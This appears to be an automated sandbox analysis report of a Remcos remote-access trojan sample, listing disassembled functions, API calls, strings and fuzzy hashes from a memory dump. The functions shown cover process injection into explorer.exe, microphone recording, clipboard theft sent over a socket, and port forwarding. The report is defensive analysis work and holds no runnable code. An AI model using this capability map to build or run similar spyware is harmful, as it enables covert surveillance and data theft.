Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99

Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705

Strings

BG3i@, xrefs: 0040662C, 00406637
[-] NtAllocateVirtualMemory Error, xrefs: 004066AA
\explorer.exe, xrefs: 0040666A
explorer.exe, xrefs: 004066BD, 004066E2
windir, xrefs: 00406654
PEB: %x, xrefs: 00406716
[+] NtAllocateVirtualMemory Success, xrefs: 0040667A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
API String ID: 2050909247-4145329354
Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D

Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5

Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00446DEF

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00446DFB
_free.LIBCMT ref: 00446E06
_free.LIBCMT ref: 00446E11
_free.LIBCMT ref: 00446E1C
_free.LIBCMT ref: 00446E27
_free.LIBCMT ref: 00446E32
_free.LIBCMT ref: 00446E3D
_free.LIBCMT ref: 00446E48
_free.LIBCMT ref: 00446E56

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85

Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00410333
inet_ntoa.WS2_32(?), ref: 004103CE

Strings

GetDirectListeningPort, xrefs: 004104D1
StartForward, xrefs: 00410492
StopReverse, xrefs: 004104C0
StartReverse, xrefs: 0041049E
>G, xrefs: 00410359
StopForward, xrefs: 004104AF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
API String ID: 3578746661-4192532303
Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E

Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C

Strings

exp, xrefs: 00455231, 00455293
acos, xrefs: 004552E4
log10, xrefs: 004551B6, 00455206
log, xrefs: 00455212, 0045521E
sqrt, xrefs: 004552F0
pow, xrefs: 00455250, 004552FC, 0045530F
asin, xrefs: 004552D8

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D

Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Sleep.KERNEL32(00000064), ref: 00416688
DeleteFileW.KERNEL32(00000000), ref: 004166BC

Strings

dxdiag, xrefs: 00416651
open, xrefs: 00416656
\sysinfo.txt, xrefs: 00416607
temp, xrefs: 0041660C
/t , xrefs: 0041663B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D

Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401AD3

Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54

waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2

Strings

x=G, xrefs: 00401B8B
.wav, xrefs: 00401AEC
`=G, xrefs: 00401B04
%Y-%m-%d %H.%M, xrefs: 00401AC4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
API String ID: 3809562944-3643129801
Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A

Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
waveInStart.WINMM ref: 00401A81

Strings

x=G, xrefs: 00401A1E
`=G, xrefs: 0040196F
XCG, xrefs: 004019A9

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: XCG$`=G$x=G
API String ID: 1356121797-903574159
Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C

Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998

Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
TranslateMessage.USER32(?), ref: 0041CA0B
DispatchMessageA.USER32(?), ref: 0041CA15
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22

Strings

Remcos, xrefs: 0041C9DA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D

Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9

Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
__alloca_probe_16.LIBCMT ref: 00452CA1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
__alloca_probe_16.LIBCMT ref: 00452D4B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
__freea.LIBCMT ref: 00452DBA
__freea.LIBCMT ref: 00452DC6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8

Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

_memcmp.LIBVCRUNTIME ref: 004446B3
_free.LIBCMT ref: 00444724
_free.LIBCMT ref: 0044473D
_free.LIBCMT ref: 0044476F
_free.LIBCMT ref: 00444778
_free.LIBCMT ref: 00444784

Strings

C, xrefs: 00444571

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44

Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

tcp, xrefs: 00413B2B
udp, xrefs: 00413B01

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A

Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18

Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588

Strings

.part, xrefs: 00406C0F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A

Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

_wcslen.LIBCMT ref: 0041A906

Strings

.exe, xrefs: 0041A858
http\shell\open\command, xrefs: 0041A83D
XCG, xrefs: 0041A8AC, 0041A8B1
program files\, xrefs: 0041A8EC, 0041A8F3, 0041A905
program files (x86)\, xrefs: 0041A900
:@, xrefs: 0041A8D3

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
API String ID: 37874593-703403762
Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9

Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
__alloca_probe_16.LIBCMT ref: 004499F2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
__alloca_probe_16.LIBCMT ref: 00449AD7
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
__freea.LIBCMT ref: 00449B47

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

__freea.LIBCMT ref: 00449B50
__freea.LIBCMT ref: 00449B75

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668

Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32 ref: 00418B18
SendInput.USER32(00000001,?,0000001C), ref: 00418B40
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
SendInput.USER32(00000001,?,0000001C), ref: 00418C0F

Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InputSend$Virtual
String ID:
API String ID: 1167301434-0
Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B

Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00415A46
EmptyClipboard.USER32 ref: 00415A54
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A

Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00446271
__freea.LIBCMT ref: 0044631B
__freea.LIBCMT ref: 00446339

Strings

a/p, xrefs: 00446400
fD, xrefs: 004465A3
am/pm, xrefs: 0044639C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm$fD
API String ID: 3509577899-1143445303
Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B

Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00447ECC
_free.LIBCMT ref: 00447EF0
_free.LIBCMT ref: 00448077
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
_free.LIBCMT ref: 00448243

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
